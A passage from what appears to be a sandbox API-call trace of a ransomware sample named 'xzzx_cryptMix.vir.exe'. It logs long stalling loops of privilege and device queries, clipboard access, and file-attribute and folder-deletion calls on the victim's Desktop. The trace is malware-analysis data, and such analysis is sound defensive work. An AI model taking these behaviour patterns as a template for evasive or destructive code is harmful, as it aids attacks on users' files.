returned 1 [0017.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.076] GetLastError () returned 0x578 [0017.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.076] GetCurrentThread () returned 0xfffffffe [0017.076] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.076] GetLastError () returned 0x3f0 [0017.076] GetCurrentProcess () returned 0xffffffff [0017.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.076] SetLastError (dwErrCode=0x522) [0017.076] CloseHandle (hObject=0x114) returned 1 [0017.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.076] GetLastError () returned 0x578 [0017.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.077] GetCurrentThread () returned 0xfffffffe [0017.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.077] GetLastError () returned 0x3f0 [0017.077] GetCurrentProcess () returned 0xffffffff [0017.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.077] SetLastError (dwErrCode=0x522) [0017.077] CloseHandle (hObject=0x114) returned 1 [0017.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.077] GetLastError () returned 0x578 [0017.077] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.077] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.077] GetCurrentThread () returned 0xfffffffe [0017.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.077] GetLastError () returned 0x3f0 [0017.077] GetCurrentProcess () returned 0xffffffff [0017.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.077] SetLastError (dwErrCode=0x522) [0017.077] CloseHandle (hObject=0x114) returned 1 [0017.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.077] GetLastError () returned 0x578 [0017.077] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.077] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.077] GetCurrentThread () returned 0xfffffffe [0017.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.077] GetLastError () returned 0x3f0 [0017.077] GetCurrentProcess () returned 0xffffffff [0017.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.077] SetLastError (dwErrCode=0x522) [0017.077] CloseHandle (hObject=0x114) returned 1 [0017.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.077] GetLastError () returned 0x578 [0017.077] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.077] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.077] GetCurrentThread () returned 0xfffffffe [0017.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.077] GetLastError () returned 0x3f0 [0017.077] GetCurrentProcess () returned 0xffffffff [0017.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.078] SetLastError (dwErrCode=0x522) [0017.078] CloseHandle (hObject=0x114) returned 1 [0017.078] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.078] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.078] GetLastError () returned 0x578 [0017.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.078] GetCurrentThread () returned 0xfffffffe [0017.078] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.078] GetLastError () returned 0x3f0 [0017.078] GetCurrentProcess () returned 0xffffffff [0017.078] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.078] SetLastError (dwErrCode=0x522) [0017.078] CloseHandle (hObject=0x114) returned 1 [0017.078] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.078] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.078] GetLastError () returned 0x578 [0017.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.078] GetCurrentThread () returned 0xfffffffe [0017.078] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.078] GetLastError () returned 0x3f0 [0017.078] GetCurrentProcess () returned 0xffffffff [0017.078] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.078] SetLastError (dwErrCode=0x522) [0017.078] CloseHandle (hObject=0x114) returned 1 [0017.078] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.078] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.078] GetLastError () returned 0x578 [0017.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.079] GetCurrentThread () returned 0xfffffffe [0017.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.079] GetLastError () returned 0x3f0 [0017.079] GetCurrentProcess () returned 0xffffffff [0017.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.079] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.079] SetLastError (dwErrCode=0x522) [0017.079] CloseHandle (hObject=0x114) returned 1 [0017.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.079] GetLastError () returned 0x578 [0017.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.079] GetCurrentThread () returned 0xfffffffe [0017.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.079] GetLastError () returned 0x3f0 [0017.079] GetCurrentProcess () returned 0xffffffff [0017.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.079] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.079] SetLastError (dwErrCode=0x522) [0017.079] CloseHandle (hObject=0x114) returned 1 [0017.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.079] GetLastError () returned 0x578 [0017.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.079] GetCurrentThread () returned 0xfffffffe [0017.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.079] GetLastError () returned 0x3f0 [0017.079] GetCurrentProcess () returned 0xffffffff [0017.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.079] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.079] SetLastError (dwErrCode=0x522) [0017.079] CloseHandle (hObject=0x114) returned 1 [0017.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.079] GetLastError () returned 0x578 [0017.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.079] GetCurrentThread () returned 0xfffffffe [0017.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.079] GetLastError () returned 0x3f0 [0017.079] GetCurrentProcess () returned 0xffffffff [0017.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.080] SetLastError (dwErrCode=0x522) [0017.080] CloseHandle (hObject=0x114) returned 1 [0017.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.080] GetLastError () returned 0x578 [0017.080] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.080] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.080] GetCurrentThread () returned 0xfffffffe [0017.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.080] GetLastError () returned 0x3f0 [0017.080] GetCurrentProcess () returned 0xffffffff [0017.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.080] SetLastError (dwErrCode=0x522) [0017.080] CloseHandle (hObject=0x114) returned 1 [0017.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.080] GetLastError () returned 0x578 [0017.080] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.080] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.080] GetCurrentThread () returned 0xfffffffe [0017.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.080] GetLastError () returned 0x3f0 [0017.080] GetCurrentProcess () returned 0xffffffff [0017.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.080] SetLastError (dwErrCode=0x522) [0017.080] CloseHandle (hObject=0x114) returned 1 [0017.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.080] GetLastError () returned 0x578 [0017.090] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.091] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0017.092] GetForegroundWindow () returned 0x101b6 [0017.092] GetWindowLongA (hWnd=0x101b6, nIndex=-4) returned 0 [0017.092] SetActiveWindow (hWnd=0x101b6) returned 0x0 [0017.092] SetWindowLongA (hWnd=0x101b6, nIndex=-4, dwNewLong=0) returned 0 [0017.092] OleInitialize (pvReserved=0x0) returned 0x0 [0017.095] OleGetClipboard (in: ppDataObj=0x18f494 | out: ppDataObj=0x18f494*=0x30e3c0) returned 0x0 [0017.096] CoInitialize (pvReserved=0x0) returned 0x1 [0017.096] CoCreateInstance (in: rclsid=0x18fae0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x5583b740*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18fe0c | out: ppv=0x18fe0c*=0x0) returned 0x80040154 [0017.185] StrDupA (lpSrch="buffer text") returned="buffer text" [0017.185] LocalFree (hMem=0x3218c8) returned 0x0 [0017.185] FormatMessageA (in: dwFlags=0x1000, lpSource=0x0, dwMessageId=0x80040154, dwLanguageId=0x800, lpBuffer=0x18c624, nSize=0x78, Arguments=0x0 | out: lpBuffer="Class not registered\r\n") returned 0x16 [0017.212] OutputDebugStringA (lpOutputString="Class not registered\r\n") [0017.214] GetDC (hWnd=0x0) returned 0x90107dd [0017.214] CreateCompatibleDC (hdc=0x90107dd) returned 0x301084d [0017.214] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eecc | out: piconinfo=0x18eecc) returned 0 [0017.214] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.214] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.214] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a058, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.214] SetFileAttributesW (lpFileName="ݯ眀\x17￾￿㲣睭\x02", dwFileAttributes=0x20) returned 0 [0017.214] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.214] GetDC (hWnd=0x0) returned 0x6010858 [0017.215] CreateCompatibleDC (hdc=0x6010858) returned 0x43010827 [0017.215] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efd0 | out: piconinfo=0x18efd0) returned 0 [0017.215] GetDC (hWnd=0x0) returned 0x2201021f [0017.215] CreateCompatibleDC (hdc=0x2201021f) returned 0x9010825 [0017.215] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eef4 | out: piconinfo=0x18eef4) returned 0 [0017.215] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.215] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.215] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9ec, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.215] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.215] wsprintfA (in: param_1=0x18e9ec, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.217] SHFileOperationA (in: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000) | out: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000)) returned 2 [0017.307] SetFileAttributesW (lpFileName="ݯȀↃɍ", dwFileAttributes=0x20) returned 0 [0017.307] GetDC (hWnd=0x0) returned 0x1a010815 [0017.307] CreateCompatibleDC (hdc=0x1a010815) returned 0x27010800 [0017.307] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eea4 | out: piconinfo=0x18eea4) returned 0 [0017.307] GetDC (hWnd=0x0) returned 0x13010223 [0017.307] CreateCompatibleDC (hdc=0x13010223) returned 0x1b01080b [0017.307] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee7c | out: piconinfo=0x18ee7c) returned 0 [0017.307] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.307] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ac74, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.307] GetDC (hWnd=0x0) returned 0x1901080a [0017.308] CreateCompatibleDC (hdc=0x1901080a) returned 0x1f010822 [0017.308] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee54 | out: piconinfo=0x18ee54) returned 0 [0017.308] GetDC (hWnd=0x0) returned 0x13010805 [0017.308] CreateCompatibleDC (hdc=0x13010805) returned 0x6010877 [0017.308] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee2c | out: piconinfo=0x18ee2c) returned 0 [0017.308] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.308] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e5dc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.308] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.308] wsprintfA (in: param_1=0x18e5dc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.308] SHFileOperationA (in: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS 